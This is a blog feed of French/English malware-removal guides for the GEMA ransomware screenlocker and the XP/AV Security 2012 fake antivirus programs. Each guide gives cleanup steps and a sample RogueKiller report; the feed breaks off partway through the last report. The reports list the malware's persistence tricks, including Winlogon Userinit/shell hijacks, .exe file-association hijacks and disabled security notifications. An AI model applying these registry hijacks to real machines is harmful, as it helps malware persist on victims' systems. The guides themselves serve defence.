gd:etag="W/&quot;DkIMRnY7fCp7ImA9WhRaEEk.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-2251981076651118843</id><published>2012-02-07T10:04:00.000-08:00</published><updated>2012-02-12T03:03:07.804-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-12T03:03:07.804-08:00</app:edited><title>[RansomWare] GEMA - L'accès à votre ordinateur a été fermé</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer le ransomware&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;"GEMA" &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt; (Gendarmerie 2)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;img border="0" height="476" src="http://4.bp.blogspot.com/-YFSh2aD62k0/TzFlb6qRHBI/AAAAAAAAAFY/3DcXaTf_qNI/s640/Ransomware_GEMA.png" width="640" /&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;i&gt;Image: Malekal.com&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s1600/Sans+titre+1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s1600/XPSecurity2011.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;Ce Ransomware / Screenlocker prend tout l'écran, empêchant tout action de l'utilisateur.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Pour s'en débarrasser, vous pouvez vous aider de la vidéo. Les instructions analogues se trouvent sinon plus bas.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/ZdsT9nmYzf0/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ZdsT9nmYzf0?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;






&lt;param name="bgcolor" value="#FFFFFF" /&gt;






&lt;embed width="600" height="375"  src="http://www.youtube.com/v/ZdsT9nmYzf0?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Pour récupérer l'accès au bureau, faire le raccourci clavier suivant :&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;ul style="text-align: center;"&gt;&lt;b&gt;&amp;nbsp;&lt;span style="color: #0c343d; font-size: small;"&gt;CTRL+ALT+PAUSE&lt;/span&gt; (le bouton pause se trouve en haut à droite)&lt;/b&gt;&lt;/ul&gt;
&lt;ul style="text-align: center;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/ul&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Attendre la fin du Prescan. Cliquer sur "Scan", et attendre la fin du scan&lt;/li&gt;
&lt;li&gt;Décocher les éventuels faux positifs. Laisser coché ce qui concerne &lt;b&gt;InetAccelerator.exe&lt;/b&gt;, il s'agit du malware.&lt;/li&gt;
&lt;li&gt;Cliquer sur "Suppression". (Puis sur Rapport pour voir ce dernier)&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant: &lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V7.0.2 [30/01/2012] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: Administrateur [Droits d'admin]&lt;br /&gt;Mode: Suppression -- Date : 02/02/2012 16:06:38&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 0 ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 5 ¤¤¤&lt;br /&gt;[BLACKLIST Value] HKCU\[...]\Run : InetAccelerator (C:\Documents and Settings\Administrateur\Application Data\InetAccelerator\InetAccelerator.exe) -&amp;gt; DELETED&lt;br /&gt;[BLACKLIST Value] HKLM\[...]\Run : InetAccelerator (C:\WINDOWS\system32\InetAccelerator.exe) -&amp;gt; DELETED&lt;br /&gt;[SUSP PATH] HKLM\[...]\Run : InetAccelerator. (C:\Documents and Settings\All Users\Application Data\InetAccelerator\InetAccelerator.exe) -&amp;gt; DELETED&lt;br /&gt;[SUSP PATH] HKCU\[...]\Winlogon : shell (C:\Documents and Settings\Administrateur\Application Data\InetAccelerator\InetAccelerator.exe,Explorer.exe,) -&amp;gt; DELETED&lt;br /&gt;[SUSP PATH] HKLM\[...]\Winlogon : Userinit (C:\Documents and Settings\All Users\Application Data\InetAccelerator\InetAccelerator.exe,C:\WINDOWS\system32\InetAccelerator.exe,C:\WINDOWS\system32\userinit.exe,) -&amp;gt; REPLACED (C:\WINDOWS\system32\userinit.exe,)&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;...&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Le malware devrait être supprimé&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/bNXj_OYdO7s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/2251981076651118843/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/02/comment-supprimer-le-ransomware-gema.html#comment-form" title="69 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/2251981076651118843?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/2251981076651118843?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/bNXj_OYdO7s/comment-supprimer-le-ransomware-gema.html" title="[RansomWare] GEMA - L'accès à votre ordinateur a été fermé" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-YFSh2aD62k0/TzFlb6qRHBI/AAAAAAAAAFY/3DcXaTf_qNI/s72-c/Ransomware_GEMA.png" height="72" width="72" /><thr:total>69</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/02/comment-supprimer-le-ransomware-gema.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UGRX4zeip7ImA9WhRWFks.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-3507703773184870924</id><published>2011-12-05T23:10:00.000-08:00</published><updated>2012-01-03T23:13:44.082-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-03T23:13:44.082-08:00</app:edited><title>[Rogue] XP Security 2012</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer XP Security 2012 &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;XP Security 2012 &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s1600/XPSecurity2011.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="457" src="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s640/XPSecurity2011.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/N6t_HQDSPRo/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/N6t_HQDSPRo?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;






&lt;param name="bgcolor" value="#FFFFFF" /&gt;






&lt;embed width="600" height="375"  src="http://www.youtube.com/v/N6t_HQDSPRo?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
_______________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Mise à jour du 04/01/2012:&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;/i&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ce Rogue vient maintenant assez souvent avec un rootkit ZeroAcces&lt;/b&gt;, non traité par RogueKiller / Malwarebyte. Si le rapport RogueKiller montre un signe d'infection nommé "ZeroAccess", à la suite de ce billet se rendre sur la page suivante et effectuer les manips nécessaires : &lt;a href="http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html"&gt;http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;u&gt;&lt;i&gt;&lt;b&gt;2011/12/05 Update&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This rogue comes often&amp;nbsp; now with some ZeroAccess rootkit, not handled by RogueKiller / Malwarebytes. If the RogueKiller report shows a "ZeroAccess" infection, please follow the next link when you finished this one :&amp;nbsp; &lt;a href="http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html"&gt;http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Mise à jour du 05/12/2011:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Ce Rogue à lancé une nouvelle campagne ces derniers jours, employant exactement le même fonctionnel, les mêmes noms et presque la même interface.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;2011/12/05 Update&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;:&lt;br /&gt;
&lt;br /&gt;
This rogue comes back these days with the same functionnal, same names and nearly the same GUI.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-eR9O8_rpCdI/Ttv9zw2vHwI/AAAAAAAAAFA/EIn2EleAcuk/s1600/XPAntivirus2012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="260" src="http://4.bp.blogspot.com/-eR9O8_rpCdI/Ttv9zw2vHwI/AAAAAAAAAFA/EIn2EleAcuk/s640/XPAntivirus2012.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
_______________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #0b5394;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;Note:&lt;/i&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Ce rogue utilise les associations de fichiers pour se relancer.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;This rogue uses file associations to restart&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Ce rogue est aussi connu sous les noms:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;This rogue is also known as: &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
XP Internet Security 2012&lt;br /&gt;
XP Antivirus 2012&lt;br /&gt;
XP Security 2012&lt;br /&gt;
XP Home Security 2012&lt;br /&gt;
XP Antispyware 2012&lt;br /&gt;
&lt;br /&gt;
Vista Antispyware 2012&lt;br /&gt;
Vista Antivirus 2012&lt;br /&gt;
Vista Home Security 2012&lt;br /&gt;
Vista Security 2012&lt;br /&gt;
Vista Internet Security 2012&lt;br /&gt;
&lt;br /&gt;
Win 7 Antispyware 2012&lt;br /&gt;
Win 7 Internet Security 2012&lt;br /&gt;
Win 7 Antivirus 2012&lt;br /&gt;
Win 7 Home Security 2012&lt;br /&gt;
Win 7 Security 2012&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;Si le rogue empêche le lancement du programme -- If you're unable to launch the program&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt; Si les extensions de fichiers ne sont pas activées, les afficher. &lt;b&gt;Puis renommer RogueKiller.exe =&amp;gt; &lt;span style="color: red;"&gt;RogueKiller.com&lt;/span&gt;&lt;/b&gt;&amp;nbsp; -- If the file associations are not   set activate them, then rename &lt;b&gt;RogueKiller.exe =&amp;gt; &lt;span style="color: red;"&gt;RogueKiller.com&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Essayer de lancer à nouveau le programme -- Try again to start the program&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V5.2.5 [24/06/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode normal&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 24/06/2011 08:02:46&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 2&lt;br /&gt;
[SUSP PATH] uvhczddcim.exe -- c:\docume~1\tigzy\locals~1\applic~1\uvhczddcim.exe -&amp;gt; KILLED&lt;br /&gt;
[SUSP PATH] fcp.exe -- c:\documents and settings\tigzy\local settings\application data\fcp.exe -&amp;gt; KILLED&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 9&lt;br /&gt;
[ROGUE ST] HKCU\[...]\Run : 1655373012 (C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe) -&amp;gt; DELETED&lt;br /&gt;
[HJ] HKLM\[...]\Security Center : AntiVirusDisableNotify (1) -&amp;gt; REPLACED (0)&lt;br /&gt;
[HJ] HKLM\[...]\Security Center : FirewallDisableNotify (1) -&amp;gt; REPLACED (0)&lt;br /&gt;
[HJ] HKLM\[...]\Security Center : UpdatesDisableNotify (1) -&amp;gt; REPLACED (0)&lt;br /&gt;
[FILE ASSO] HKCU\[...]Software\Classes\.exe\shell\open\command :&amp;nbsp; ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "%1" %*) -&amp;gt; REPLACED : ("%1" %*)&lt;br /&gt;
[FILE ASSO] HKCU\[...]Software\Classes\exefile\shell\open\command :&amp;nbsp; ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "%1" %*) -&amp;gt; REPLACED : ("%1" %*)&lt;br /&gt;
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command :&amp;nbsp; ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe") -&amp;gt; REPLACED : ("C:\Program Files\mozilla firefox\firefox.exe")&lt;br /&gt;
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command :&amp;nbsp; ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode) -&amp;gt; REPLACED : ("C:\Program Files\mozilla firefox\firefox.exe" -safe-mode)&lt;br /&gt;
[FILE ASSO] HKLM\[...]Software\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command :&amp;nbsp; ("C:\Documents and Settings\tigzy\Local Settings\Application Data\fcp.exe" -a "C:\Program Files\Internet Explorer\iexplore.exe") -&amp;gt; REPLACED : ("C:\Program Files\internet explorer\IEXPLORE.EXE")&lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[2].txt &amp;gt;&amp;gt;&lt;br /&gt;
RKreport[1].txt ; RKreport[2].txt&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; &lt;br /&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue should have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/6MGIeNUeHN8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/3507703773184870924/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/06/rogue-xp-vista-seven-security-2012.html#comment-form" title="65 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3507703773184870924?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/3507703773184870924?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/6MGIeNUeHN8/rogue-xp-vista-seven-security-2012.html" title="[Rogue] XP Security 2012" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s72-c/XPSecurity2011.PNG" height="72" width="72" /><thr:total>65</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/06/rogue-xp-vista-seven-security-2012.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE4CRHs5eSp7ImA9WhRSFUw.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-3666409201282472584</id><published>2011-11-16T22:50:00.001-08:00</published><updated>2011-11-16T22:56:05.521-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-16T22:56:05.521-08:00</app:edited><title>[Rogue] AV Security 2012</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer AV Security 2012&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;AV Security 2012&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7p0gTx6ONGo/TsSv6cugipI/AAAAAAAAAE4/muIPm0vFV7k/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="408" src="http://2.bp.blogspot.com/-7p0gTx6ONGo/TsSv6cugipI/AAAAAAAAAE4/muIPm0vFV7k/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-veruH0uKKBA/TrzsG3nfgpI/AAAAAAAAAEg/_flOC76HeDU/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/mp89qKSEdIs/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/mp89qKSEdIs?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;

&lt;param name="bgcolor" value="#FFFFFF" /&gt;

&lt;embed width="600" height="375"  src="http://www.youtube.com/v/mp89qKSEdIs?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.9 [16/11/2011] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;Mode: Suppression -- Date : 17/11/2011 07:45:13&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 1 ¤¤¤&lt;br /&gt;[WINDOW : AV Security 2012] AV Security 2012v121.exe -- C:\WINDOWS\system32\AV Security 2012v121.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 2 ¤¤¤&lt;br /&gt;[RESIDU] HKLM\[...]\Run : lOL3rbI2dU1d8234A (C:\WINDOWS\system32\AV Security 2012v121.exe) -&amp;gt; DELETED&lt;br /&gt;[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -&amp;gt; REPLACED (0)&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [LOADED] ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Infection :&amp;nbsp; ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br 